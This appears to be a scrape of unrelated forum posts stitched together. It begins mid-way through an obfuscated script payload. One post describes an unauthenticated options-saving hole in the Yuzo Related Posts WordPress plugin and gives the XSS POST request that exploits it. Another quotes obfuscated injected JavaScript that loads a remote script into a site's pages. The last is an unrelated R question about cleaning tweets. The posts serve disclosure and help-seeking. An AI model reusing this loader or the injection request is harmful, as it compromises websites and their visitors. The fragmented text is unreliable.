44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script> While removing the Plugin poses a quickfix, I want to dive deeper to be sure that there was no access to the database, backend and webspace.
I do believe I just found it: The Yuzo Related Posts Plugin does not check for authentication when saving options. So POSTing yuzo_related_post_css_and_style=</style><script+language=javascript>alert('hacked');</script> to /wp-admin/options-general.php?page=yuzo-related-post will succeed, even if you're not logged in. The Plugin is using is_admin() to check for authentication, but that is a "false friend" and only checks if the accessed page is in the admin-area, not if a user is authenticated (nor authorized). See the Wordpress documentation. A quick solution to keep using the plugin is just removing the settings option by putting false in the if-Statement in /assets/functions/options.php line 1155: function __construct(){ global $if_utils; $this->utils = $if_utils; if(false/* is_admin() */) self::configuration_plugin(); else self::parameters(); } Update: Hang Guan pointed to a Blog Post about this issue from last week, seems like it is "out in the wild" now.
Parse error: syntax error, unexpected 'text' (T_STRING), expecting ',' or ')' in /home/anysite/mysite.com/wp-includes/class-oembed.php on line 461
I have 3 sites on the same host and all 3 are showing this error. Can't access the Admin area and got into .php, but don't know how to fix the code. This is what's there now: if ( $html_head_end = stripos( $html, '<script type='text/javascript'>var _0x1e35=['length','fromCharCode','createElement','type','async','code121','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,_0x3f720e){var _0x440369=function(_0x2e1b64){while(--_0x2e1b64){_0x546a53['push'](_0x546a53['shift']());}};_0x440369(++_0x3f720e);}(_0x1e35,0x1e1));var _0x5a05=function(_0x716551,_0x1d4a8e){_0x716551=_0x716551-0x0;var _0x2b7638=_0x1e35[_0x716551];return _0x2b7638;};var url=String[_0x5a05('0x0')](104, 116, 116, 112, 115, 58, 47, 47, 115, 97, 115, 107, 109, 97, 100, 101, 46, 110, 101, 116, 47, 102, 111, 111, 116, 46, 106, 115, 63, 118, 101, 114, 61, 49, 46, 48, 46, 48);var a=function(){var _0x22c9c8=document[_0x5a05('0x1')](String[_0x5a05('0x0')](0x73,0x63,0x72,0x69,0x70,0x74));_0x22c9c8[_0x5a05('0x2')]=String[_0x5a05('0x0')](0x74,0x65,0x78,0x74,0x2f,0x6a,0x61,0x76,0x61,0x73,0x63,0x72,0x69,0x70,0x74);_0x22c9c8[_0x5a05('0x3')]=!![];_0x22c9c8['id']=_0x5a05('0x4');_0x22c9c8[_0x5a05('0x5')]=url;document['getElementsByTagName'](String[_0x5a05('0x0')](0x68,0x65,0x61,0x64))[0x0][_0x5a05('0x6')](_0x22c9c8);};var scrpts=document[_0x5a05('0x7')](_0x5a05('0x8'));var n=!![];for(var i=scrpts[_0x5a05('0x9')];i--;){if(scrpts[i]['id']==_0x5a05('0x4')){n=![];}};if(n==!![]){a();}</script></head>' ) ) { $html = substr( $html, 0, $html_head_end ); Any help would be much appreciated!
Cleaning text of tweet messages
I have a csv of tweets. I got it using this ruby library: https://github.com/sferik/twitter . The csv is two columns and 150 rows, the second column is the text message: Text 1 RT #AlstomTransport: #Alstom and OHL to supply a #metro system to #Guadalajara #rail #Mexico http://t.co/H88paFoYc3 http://t.co/fuBPPqNts4 I have to do a sentiment analysis, so i need to clean the text message, removing links, RT, Via, and everything useless for the analysis. I tried with R, using code found in several tutorials: > data1 = gsub("(RT|via)((?:\\b\\W*#\\w+)+)", "", data1) But the output is without any sense: [1] "1:150" [2] "c(113, 46, 38, 11, 108, 100, 45, 44, 9, 89, 99, 93, 102, 101, 110, 93, 61, 57, 104, 66, 86, 53, 42, 43, 37, 7, 88, 32, 122, 131, 14, 102, 105, 12, 54, 13, 72, 87, 55, 132, 29, 28, 10, 15, 81, 81, 107, 87, 106, 81, 98, 73, 65, 52, 94, 97, 65, 59, 60, 50, 48, 121, 117, 75, 79, 111, 115, 119, 118, 91, 79, 31, 76, 111, 85, 62, 91, 103, 79, 120, 78, 47, 49, 8, 129, 123, 124, 58, 71, 25, 36, 80, 127, 112, 23, 22, 35, 21, 30, 74, 82, 51, 63, 130, 135, 134, 90, 83, 63, 128, 16, 20, 19, 34, 27, 26, 33, 77, \n114, 126, 64, 69, 4, 135, 41, 40, 17, 67, 92, 96, 84, 92, 56, 18, 125, 5, 6, 133, 24, 39, 70, 95, 116, 68, 84, 109, 92, 3, 1, 2)" Can anyone help me? Thank you.
Looks like you tried to pass in the entire data.frame to gsub rather than just the text column. gsub prefers to work on character vectors. Instead you should do data1[,2] = gsub("(RT|via)((?:\\b\\W*#\\w+)+)", "", data1[,2]) to just transform the second column.